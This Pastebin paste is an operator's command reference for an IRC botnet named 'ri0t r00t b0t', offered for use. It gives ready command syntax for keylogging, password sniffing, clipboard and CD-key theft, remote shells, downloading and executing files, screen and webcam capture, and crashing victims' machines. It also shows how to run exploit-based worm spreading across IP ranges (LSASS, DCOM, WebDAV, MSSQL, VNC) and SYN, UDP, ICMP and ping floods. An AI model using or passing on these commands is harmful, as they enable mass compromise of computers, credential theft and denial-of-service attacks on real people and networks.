Guest User

Untitled

a guest
Jun 7th, 2012
799
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.86 KB | None | 0 0
  1. .login * login password
  2. .logout * logout
  3. .who * who
  4. .getclip * get clip board data
  5. .currentip * current ip scanning
  6. .rloginserver * rlogin server (login with putty)
  7. .get * get filename.zip
  8. .redirect * redirect
  9. .update * update Http://Www.Website.Com/File.exe BotID.
  10. .download * download http://Website.Com/File.exe C:\File.exe 1 ( 1 = execute : 0 = don`t execute )
  11. .execute * execute C:\file.exe
  12. .findfile * findfile file.exe C:\
  13. .findfilestop * findfilestop
  14. .rename * rename botfilename.exe botfilename2.exe
  15. .mode * mode +i-x
  16. .version * version
  17. .gethost * get host info
  18. .delay * delays action
  19. .secure * secures bot
  20. .securestop * stopsecure
  21. .unsecure * unsecures bot
  22. .ident on * enable ident server
  23. .ident off * disable ident server
  24. .keylog on * enable key loger
  25. .keylog off * disable key loger
  26. .join * join #Channel
  27. .part * part #Channel
  28. .netinfo * netinfo
  29. .sysinfo * sysinfo
  30. .raw * raw #Channel +o Himmler
  31. .prefix * prefix $ (change prefix to...)
  32. .open * open File
  33. .server * server Irc.AnotherServer.Net
  34. .dns * dns host.name.net
  35. .addalias * addalias " untested "
  36. .privmsg * privmsg #Channel Hello / Nickname Fuck u
  37. .action * perform action
  38. .cycle * cycle (do something repetitive) eg .cycle 5 join #lolol
  39. .die * kill ur bot.exe " is will be back after the next restart
  40. .email * email mx3.hotmail.com [email protected] [email protected] Subject Msg
  41. .httpcon * httpcon
  42. .upload * upload
  43. .reconnect * reconnect
  44. .disconnect * disconnect
  45. .status * status
  46. .mirccmd * mirccmd
  47. .cmd * remote cmd (.opencmd to activate)
  48. .system reboot * restart bot victim machine
  49. .system shutdown * shutdown bot victim machine
  50. .system logoff * logoff bot victim machine
  51. .threads * list threads
  52. .killthread all * kill all threads
  53. .getcdkeys * get cdkeys for windows / games
  54. .driveinfo * get drivers info
  55. .opencmd * opencmd
  56. .cmdstop * stopcmd
  57. .httpserver * httpserver C:\ or D:\
  58. .httpstop * stop http server
  59. .tftpserver * start tftp
  60. .tftpstop * stop tftp
  61. .crash * crash bot victim machine ( destroy all system )
  62. .findpass * get bot victim passwords
  63. .nick * change bot nick
  64. .log * list bot log
  65. .clearlog * clear log list
  66. .procs * list all files running in bot victim P.c
  67. .procsstop * procsstop File.exe
  68. .killproc * killprocs File.exe
  69. .delete * delete C:\File.exe
  70. .list * list *.exe or *.zip or *.rar any extensions u want list from bot victim P.c
  71. .visit * visit http://www.website.com ( hiden )
  72. .readfile * readfile C:\file.txt
  73. .psniff on * pass sniff on
  74. .psniff off * pass sniff off
  75. .remove * remove bot completly from vistim pc
  76.  
  77. psniff can steal any information about
  78. (Bots Net) (Ftp) (Php) (Http) (Mirc) (Users) (Accounts) (Admins) (Opers )
  79.  
  80. .net start
  81. .net stop
  82. .net pause
  83. .net continue
  84. .net delete
  85. .net share
  86. .net user
  87. .net send
  88. .capture video
  89. .capture screen
  90. .capture drivers
  91. .capture frame
  92. .clone irc.server.net:6667 #Channel
  93. .c_join
  94. .c_part
  95. .C_raw
  96. .c_mode
  97. .c_nick
  98. .c_privmsg
  99. .c_notice
  100. .c_rndnick
  101. .clonestop
  102. .c_quit
  103.  
  104. -=-=-=-=-=-=-=-=-=-=-=-
  105. ; Using Exploits ;
  106. -=-=-=-=-=-=-=-=-=-=-=-
  107. ri0t r00t b0t comes with many exploits listed below is how to use them:
  108.  
  109. -r = random range scanner from the " Bot Ip " Ex: " the bot connect from ip ( 62.150.15.15 )
  110. the -r scanning from 62.150.0.0 to 62.150.255.255 but in random method
  111.  
  112. -b = same -r but in Sequential method from 62.150.0.0 to 62.150.255.255
  113. -a = long range scanner from first range of bot ip Ex: 62.0.0.0 to 62.255.255.255
  114. -s = silent u can used with all Bot Commands, no reply msg from the bots
  115. x = ip range ex: 0 to 255
  116. u can scan fot ip range u choiced Ex: advscan lsass 100 5 999 62.150.x.x -r
  117. 100 = scanner threads
  118. 5 = delay in sec
  119. 999 = time of scanner
  120.  
  121. .advscan lsass 100 5 999 -r * Lsass Exploit Spreader Using Port 445
  122. .advscan iis5ssl 100 5 999 -b * IIS 5 SSL Exploit Spreader Using Port 443
  123. .advscan dcom135 100 5 999 -a * Dcom Exploit Spreader Using Port 135
  124. .advscan dcom445 100 5 999 -r -s * Dcom Exploit Spreader Using Port 445
  125. .advscan dcom1025 100 5 999 -b -s * Dcom Exploit Spreader Using Port 1025 ( is shit )
  126. .advscan dcom2-135 100 5 999 -a -s * Dcom2 Exploit Spreader Using Port 135
  127. .advscan dcom2-445 100 5 999 -r * Dcom2 Exploit Spreader Using Port 445
  128. .advscan beagle1 100 5 999 -r * Bagle Exploit Spreader Using Port 2745
  129. .advscan beagle2 100 5 999 -r * Bagle2 Exploit Spreader Using Port 2745
  130. .advscan webdav 100 5 999 -r * WebDav Exploit Spreader Using Port 80
  131. .advscan wkssvc 100 5 999 -r * Wks Exploit Spreader Using Port 135
  132. .advscan wkssvc2 100 5 999 -r * Wks Exploit Spreader Using Port 445
  133. .advscan dameware 100 5 999 -r * DameWare Exploit Spreader Using Port 6129
  134. .advscan upnp 100 5 999 -r * UPNP Exploit Spreader Using Port 5000
  135. .advscan mydoom 100 5 999 -r * MyDoom Exploit Spreader Using Port 3127
  136. .advscan netbios 100 5 999 -r * NetBios Exploit Spreader Using Port 139
  137. .advscan ntpass 100 5 999 -r * NB+NP Exploit Spreader Using Port 445
  138. .advscan mssql 100 5 999 -r * MSSQL Exploit Spreader Using Port 1433
  139. .advscan vnc 100 5 999 -r * VNC Exploit spreader Using Port 5900
  140. .advscan optix 100 5 999 -r * Optix Trojan Spreader Using Port 3410
  141. .advscan sub7 100 5 999 -r * Sub7 Trojan Spreader Using Port 27374
  142. .advscan netdevil 100 5 999 -r * NetDevil Trojan Spreader Using Port 901
  143. .advscan netdevil2 100 5 999 -r * NetDevil Trojan Spreader Using Port 903
  144. .scanstats * Get Scan Stats
  145. .scanstop * Stop Scanning
  146.  
  147. -=-=-=-=-=-=-=-=-=-=-=-=-
  148. ; Flooders for the nubs ;
  149. -=-=-=-=-=-=-=-=-=-=-=-=-
  150.  
  151. .icmpflood * icmpflood 62.150.15.15 99999
  152. .synflood * synflood 62.150.15.15 1000 2000
  153. .udpflood * udpflood Ip Number Size Delay
  154. .pingflood * pingflood Ip Number Size Delay
  155. .tcpflood * Ip Port r
  156.  
  157. .icmpstop
  158. .tcpstop
  159. .synstop
  160. .udpstop
  161. .pingstop
  162.  
  163.  
  164. Thats all, have a play around with each command to get use to how the bot works and
  165. how to control it better and so forth.
  166.  
  167. ~h1t3m
Advertisement
Add Comment
Please, Sign In to add comment